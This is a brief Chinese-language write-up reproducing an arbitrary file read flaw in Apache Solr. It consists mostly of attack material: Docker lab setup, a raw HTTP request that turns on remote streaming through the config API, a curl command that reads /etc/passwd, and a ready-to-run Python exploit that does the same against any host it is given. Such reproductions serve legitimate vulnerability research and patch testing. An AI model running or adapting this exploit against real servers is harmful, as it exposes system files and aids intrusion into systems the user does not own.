Apache-Solr 任意文件读取漏洞复现
使用Docker
docker pull solr docker run --name solr2 -d -p 8081:8983 solr
然后进入容器
#如果不把这块放进去新建core 的时候会报错的 cd /opt/solr-8.7.0/server/solr/configsets/_default mkdir /var/solr/data/new_core cp -r conf /var/solr/data/new_core 关闭容器。 并重启; docker stop a6d76241265f docker start a6d76241265f
然后进行测试
首先获取core
http://192.168.1.79:8081/solr/admin/cores?indexInfo=false&wt=json
这里可以获取很多核心。我只用new_core 作为测试
POST /solr/new_core/config HTTP/1.1 Host: 192.168.1.79:8081 Content-Length: 80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Content-Type: application/json Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
读取文件
curl "http://192.168.1.79:8081/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
exp:
#!/usr/bin/python # coding: UTF-8 import requests host="http://192.168.1.79:8081/" if host[-1]=='/': host=host[:-1] def get_core(host): url=host+'/solr/admin/cores?indexInfo=false&wt=json' core_data=requests.get(url,timeout=3).json() if core_data['status']: core=core_data['status'].keys()[0] jsonp_data={"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":'true'}} requests.post(url=host+"/solr/%s/config"%core,json=jsonp_data) result_data=requests.post(url=host+'/solr/%s/debug/dump?param=ContentStreams'%core,data={"stream.url":"file:///etc/passwd"}).json() if result_data['streams']: print result_data['streams'][0]['stream'] else: exit("不存在此漏洞") get_core(host)